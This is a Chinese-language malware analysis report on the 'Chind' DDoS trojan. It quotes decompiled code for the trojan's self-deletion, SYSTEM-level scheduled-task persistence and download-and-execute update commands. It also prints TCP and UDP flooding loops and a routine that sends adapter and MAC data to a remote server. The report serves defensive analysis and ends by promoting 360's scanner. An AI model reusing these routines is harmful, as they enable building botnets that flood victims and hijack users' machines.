摘要
事件起因:
前一段时间国外网站曝出一个中国的受害者来执行DDOS的一个木马—Chind,在该木马准备长攻击前,会先检测用户是否使用360,如果检测到就会停止攻击.这里就对该木马行为进行详细报告
木马危害:
该木马长期潜伏在用户电脑中,使用户变肉鸡,在适当时候会对指定目标进行攻击(攻击时间由发起者决定),对被攻击目标进行DOS攻击。大量的肉鸡同时对一个目标发送大量数据,会导致被攻击目标网络瘫痪,而对于中招用户来说一旦被攻击的网站对攻击事件进行追查,能查到的直接源头就是这些无辜的中招用户
木马行为分析
0x00 木马基本信息
MD5:5a454c795eccf94bf6213fcc4ee65e6d
加壳情况:UPX -> Markus & Laszlo ver. [ 3.91 ] <- info from file.
基本行为:自我复制,自我删除,开机自启动,随时更新下载最新版本木马,攻击目标主机
0x01 使用**upx**压缩壳减小体积
从压缩前后可以看到体积减小了一半
0x02 创建互斥量,保证只有一个木马在运行
2.1.使用sleep函数使木马进入短暂休眠状态(该木马使用大量sleep函数,后面就不在提出了)
SetErrorMode(0x8003u);
SetUnhandledExceptionFilter(TopLevelExceptionFilter);
Sleep(0x2710u);
2.2.创建唯一标识”Global\3672a9586a5f342b2ca070851e425db6″
hObject = CreateMutexW(0, 1, L"Global\\3672a9586a5f342b2ca070851e425db6");
0x03互斥量创建
if ( hObject && GetLastError() == 183 ){
DleteItSelf();
TopLevelExceptionFilter(v5);
}
3.1如果CreateMutexW()函数返回183(该互斥量已存在,无法创建),此时进程会删除自身
if ( GetModuleFileNameW(0, &Filename, 0x104u) )
{
if ( GetShortPathNameW(&Filename, &Filename, 0x104u) )
{
lstrcpyW(&String1, L"/c del ");
lstrcatW(&String1, &Filename);
lstrcatW(&String1, L" >> NUL");
if ( GetEnvironmentVariableW(L"ComSpec", &Filename, 0x104u) )
{
if ( (signed int)ShellExecuteW(0, 0, &Filename, &String1, 0, 0) > 32 )
result = 1;
}
}
3.2进程退出
v0 = GetCurrentProcess();
return TerminateProcess(v0, 0);
0x04.根据当前进程具有的系统权限,选择路径进行自我复制
BOOL sub_405DF0()
{
WCHAR *v0; // [ST04_4@1
](mailto:ST04_4@1) WCHAR *v1; // eax@1
v0 = GetPath();
v1 = GetModuleFileName();
return CopyFileW(v1, v0, 0);
}
4.1获取复制自身所到的路径GetPath()
if ( judgegrade() )
{
GetWindowsDirectoryW(&FileName, 0x104u);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\Init\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
else if ( SHGetFolderPathW(0, 26, 0, 0, &FileName) >= 0 )
{
PathAppendW(&FileName, L"\\Microsoft\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
4.1.1 判断系统的权限 JudgeGrade()
if ( judgegrade() )
{
GetWindowsDirectoryW(&FileName, 0x104u);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\Init\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
else if ( SHGetFolderPathW(0, 26, 0, 0, &FileName) >= 0 )
{
PathAppendW(&FileName, L"\\Microsoft\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
0x05对当前进程权限判断,选择长期驻扎在系统
5.1判断当前进程运行的权限是否是管理员权限(前面已经提到过,不在重复)
5.2如果是管理员权限,则直接写入注册表,开机自启动
5.3如果不是管理员权限,先判断系统版本
5.3.1如果系统版本是一下版本中的一个,则直接创建注册表,达到开机自启动就可以了(同5.2)
Windows Vista Windows Server 2003 R2 Windows Home Server Windows Server 2003Windows XP Professional x64 Edition Windows XP Windows 2000
5.3.2如果系统版本不是以上中的一个,则调用schtask.exe来创建服务,使木马不仅能够开机自启动,还能够以管理员权限运行
schtasks.exe命令行解析
/sc onstart 指定该服务是开机时便开始运行
/tn Microsoft\\Windows\\Shell\\Init 指定任务名为"'Microsoft\\Windows\\Shell\\Init"
/tr \"\\\"%s\\\"\" 制定任务路径
/ru system 指定该任务具有system权限
GetSystemDirectoryW(&Buffer, 0x104u);
wsprintfW(&File, L"%s\\schtasks.exe", &Buffer);
if ( sub_406400() ){
sub_406030();
} else {
v0 = sub_404CB0();
wsprintfW( &Parameters,
L"/create /F /sc onstart /tn Microsoft\\Windows\\Shell\\Init /tr \"\\\"%s\\\"\" /ru system",
v0);}
DeleteTask();
Sleep(0x2710u);
return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0);
5.3.3每次创建任务之前都会先删除任务。以保证任务能够成功创建
wsprintfW(&Parameters, L"/delete /TN Microsoft\\Windows\\Shell\\Init /F", &Buffer);
return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0);
0x06**创建进程,删除自身**
6.1运行刚刚复制的替身
6.2删除自身(同3.1)
0x07 测试网络是否畅通
如果不畅通,木马会开始不停的休眠,唤醒后继续尝试访问,到达一定次数后还没网络时则木马会自动退出
while ( 1 ){
v10 = TestInter();
if ( v10 )
break;
Sleep(0x1D4C0u);
++v12;
if ( v12 >= 30 )
ExitProcess(0);
}
7.1用到的测试网址都是经常用到的网址
for ( i = 0; i < 10; ++i ){
if ( SetInterConn("http://www.baidu.com/") )
return 1;
if ( SetInterConn("http://www.microsoft.com/") )
return 1;
if ( SetInterConn("http://www.qq.com/") )
return 1;
}
7.1.1连接设置 SetInterConn()
v3 = 0;
hInternet = InternetOpenA(&byte_4326BF, 1u, 0, 0, 0);
Buffer = 5000;
InternetSetOptionA(hInternet, 2u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_TIMEOUT
InternetSetOptionA(hInternet, 5u, &Buffer, 4u); //INTERNET_OPTION_SEND_TIMEOUT
InternetSetOptionA(hInternet, 6u, &Buffer, 4u); //INTERNET_OPTION_RECEIVE_TIMEOUT
Buffer = 5;
InternetSetOptionA(hInternet, 3u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_RETRIES
InternetSetOptionA(hInternet, 0x4Du, 0, 0);
v4 = InternetOpenUrlA(hInternet, lpszUrl, &byte_4326C3, 0, 0, (DWORD_PTR)&dwContext); //INTERNET_OPTION_IGNORE_OFFLINE
if ( v4 )
v3 = 1;
if ( v4 )
InternetCloseHandle(v4);
if ( hInternet )
InternetCloseHandle(hInternet);
return v3;
0x08 根据当前进程的权限决定将接受命令的文件所放的目录
8.1判断当前进程是否拥有管理员权限(同4.1.1)
8.2获取命令文件所放路径
if ( judgegrade() )
{
GetWindowsDirectoryW(&pszPath, 0x104u);
PathAppendW(&pszPath, L"\\Logs\\");
CreateDirectoryW(&pszPath, 0);
PathAppendW(&pszPath, L"\\WMI\\");
CreateDirectoryW(&pszPath, 0);
PathAppendW(&pszPath, L"\\Event\\");
CreateDirectoryW(&pszPath, 0);
SetFileAttributesW(&pszPath, 2u);
PathAppendW(&pszPath, L"\\SystemEvent.evt");
}
else if ( SHGetFolderPathW(0, 26, 0, 0, &pszPath) >= 0 )
{
PathAppendW(&pszPath, L"\\Microsoft\\");
CreateDirectoryW(&pszPath, 0);
PathAppendW(&pszPath, L"\\System\\");
CreateDirectoryW(&pszPath, 0);
SetFileAttributesW(&pszPath, 2u);
PathAppendW(&pszPath, L"\\wow64.dll");
}
return &pszPath;
0x09命令文件读取成功
9.1读取命令配置文件
ReadFile(hFile, lpBuffer, nNumberOfBytesToRead, &NumberOfBytesRead, 0);
9.2解密命令配置文件
该文件采用Salsa20加密算法对命令配置文件进行了一次加密,从下面这里的反汇编代码就可以看出是Salsa20算法
while ( v102 );
sub_40BBE0(a1, v6 + v101);
sub_40BBE0(v70 + 4, v7 + v100);
sub_40BBE0(v71 + 8, v8 + v99);
sub_40BBE0(v72 + 12, v9 + v98);
sub_40BBE0(v73 + 16, v97 + v111);
sub_40BBE0(v74 + 20, v96 + v116);
sub_40BBE0(v75 + 24, v95 + v110);
sub_40BBE0(v76 + 28, v94 + v109);
sub_40BBE0(v77 + 32, v93 + v108);
sub_40BBE0(v78 + 36, v92 + v107);
sub_40BBE0(v79 + 40, v91 + v114);
sub_40BBE0(v80 + 44, v90 + v106);
sub_40BBE0(v81 + 48, v89 + v105);
sub_40BBE0(v82 + 52, v88 + v104);
sub_40BBE0(v83 + 56, v87 + v103);
sub_40BBE0(v84 + 60, v86 + v112);
return 0
9.2对接受到的命令进行相应的操作
该木马能接受的命令如下
update:储当前的cnc到一个加密文件,并报告给服务器。然后,下载并执行最新版的木马,接着删除旧版木马。(篇幅有限,只列出部分)
GetTempPathA(0x104u, &Buffer);
GetTempFileNameA(&Buffer, &byte_4326CB, 0, &TempFileName);
DeleteFileA(&TempFileName);
v8 = (int)&v11;
do
v9 = *(_BYTE *)(v8++ + 1);
while ( v9 );
v4 = v8;
*(_DWORD *)v8 = 1702389038;
*(_BYTE *)(v4 + 4) = 0;
DeleteUrlCacheEntryA(lpszUrlName);
URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0);
DeleteUrlCacheEntryA(lpszUrlName);
if ( sub_405800(&TempFileName, a3) )
{
memset(&StartupInfo, 0, 0x44u);
StartupInfo.cb = 68;
ProcessInformation.hProcess = 0;
ProcessInformation.hThread = 0;
ProcessInformation.dwProcessId = 0;
ProcessInformation.dwThreadId = 0;
CloseHandle(hObject);
CreateProcessA(&TempFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
DeleteItself();
TopLevelExceptionFilter();
}
result = DeleteFileA(&TempFileName);
url_exec:从指定的URL上下载文件,并使用WinExec来执行这个文件
GetTempPathA(0x104u, &Buffer);
GetTempFileNameA(&Buffer, &PrefixString, 0, &TempFileName);
DeleteFileA(&TempFileName);
v4 = &v6;
do
v2 = (v4++)[1];
while ( v2 );
*(_DWORD *)v4 = 1702389038;
v4[4] = 0;
DeleteUrlCacheEntryA(lpszUrlName);
URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0);
DeleteUrlCacheEntryA(lpszUrlName);
result = sub_405800(&TempFileName, a2);
if ( result )
result = WinExec(&TempFileName, 0);
具体如下图表格
0x0A通过UDP或TCP创建连接**,实现DDOS攻击**
A.1创建TCP连接
name.sa_family = 2;
*(_DWORD *)&name.sa_data[2] = inet_addr(cp);
if ( v10 && v11 )
*v11 = 58;
while ( 1 ){
s = socket(2, 1, 6);
if ( v10 ){
*(_WORD *)&name.sa_data[0] = htons(v10);
}
else{
v1 = HandleError();
*(_WORD *)&name.sa_data[0] = htons(v1);
}
connect(s, &name, 16);
argp = 1;
ioctlsocket(s, -2147195266, &argp);
send(s, buf, len, 0);
shutdown(s, 1);
closesocket(s);
A.2创建UDP连接
result = socket(2, 2, 17);
s = result;
if ( result >= 0 ){
*(_DWORD *)&to.sa_family = 0;
*(_DWORD *)&to.sa_data[2] = 0;
*(_DWORD *)&to.sa_data[6] = 0;
*(_DWORD *)&to.sa_data[10] = 0;
to.sa_family = 2;
*(_DWORD *)&to.sa_data[2] = inet_addr(cp);
while ( 1 ){
v9 = v10++ % 0x2710u;
if ( !v9 ){
v2 = HandleError();
memset(&buf, v2, 0x2000u);
}
v3 = HandleError();
*(_WORD *)&to.sa_data[0] = htons(v3);
len = HandleError() % 4096 + 4096;
sendto(s, &buf, len, 0, &to, 16);
0x0B 再次接受指令
在创建DOS攻击线程后,该木马还会继续创建一个线程,到某个只指定的网址去下载文件,然后对文件进行解密和执行获取到的命令
hInternet = InternetOpenA(&szAgent, 1u, 0, 0, 0);
Buffer = 5000;
InternetSetOptionA(hInternet, 2u, &Buffer, 4u);
InternetSetOptionA(hInternet, 5u, &Buffer, 4u);
InternetSetOptionA(hInternet, 6u, &Buffer, 4u);
Buffer = 5;
InternetSetOptionA(hInternet, 3u, &Buffer, 4u);
InternetSetOptionA(hInternet, 0x4Du, 0, 0);
DeleteUrlCacheEntryA(lpszUrlName);
hFile = InternetOpenUrlA(hInternet, lpszUrlName, &szHeaders, 0, 0x4040300u, (DWORD_PTR)&dwContext);
if ( hFile ){
v16 = 0;
v3 = About_Expection_badalloc_4(0);
v14 = v3;
do{
while ( !InternetReadFile(hFile, &v18, 0x1000u, &dwNumberOfBytesRead) );
v9 = dwNumberOfBytesRead + v16;
v4 = About_Expection_badalloc_4(dwNumberOfBytesRead + v16);
v10 = v4;
memmove_0(v4, v14, v16);
v5 = v14;
j_j__free(v14);
memmove_0((char *)v10 + v16, &v18, dwNumberOfBytesRead);
v14 = v10;
v16 = v9;
}
while ( dwNumberOfBytesRead );
v12 = M_decode(v14, v16);
if ( v12 ){
v8 = AcceptOrder((int)v12, 0);
v7 = v12;
j_j__free(v12);
}
0x0C**获取网卡信息**
C.1通过调用 GetAdaptersInfo函数获取Adapter Name,Mac,Ip,NetMask,NetGate等信息
GetAdaptersInfo(&AdapterInfo, &SizePointer);
v3 = &AdapterInfo;
memset(&unk_43F1C8, 0, 0x1000u);
sub_41A958((int)&unk_43F1C8, "%d_", 32);
do{
v4 = v3->Address;
sub_41A958(
(int)&unk_43F1C8,
"%s_%02x%02x%02x%02x%02x%02x%02x%02x",
&unk_43F1C8,
v3->Address[0],
v3->Address[1],
v3->Address[2],
v3->Address[3],
v3->Address[4],
v3->Address[5],
v3->Address[6],
v3->Address[7]);
v3 = v3->Next;
}
C.2通过调用InternetOpeUrl()将刚刚获取到的本机信息发送至目标服务器
hInternet = InternetOpenA(&byte_4326C6, 1u, 0, 0, 0);
Buffer = 5000;
InternetSetOptionA(hInternet, 2u, &Buffer, 4u);
InternetSetOptionA(hInternet, 5u, &Buffer, 4u);
InternetSetOptionA(hInternet, 6u, &Buffer, 4u);
Buffer = 5;
InternetSetOptionA(hInternet, 3u, &Buffer, 4u);
InternetSetOptionA(hInternet, 0x4Du, 0, 0);
sub_41A958((int)&szUrlName, "%s%s", a1, a2);
DeleteUrlCacheEntryA(&szUrlName);
result = InternetOpenUrlA(hInternet, &szUrlName, &byte_4326C7, 0, 0, (DWORD_PTR)&dwContext);
v5 = result;
if ( result )
v4 = 1;
if ( v5 )
result = (HINTERNET)InternetCloseHandle(v5);
if ( hInternet )
result = (HINTERNET)InternetCloseHandle(hInternet);
现在这个网站已经不能访问,所以也返回不了数据了。
结论:
安装360卫士,可完美查杀。安装360安全卫士进行全盘扫描,看看你们是不是中招了。千万不要一不小心就被别人利用了,出大事了什么事都还的无辜的群众来承担。
360安全卫士成功扫描
Comments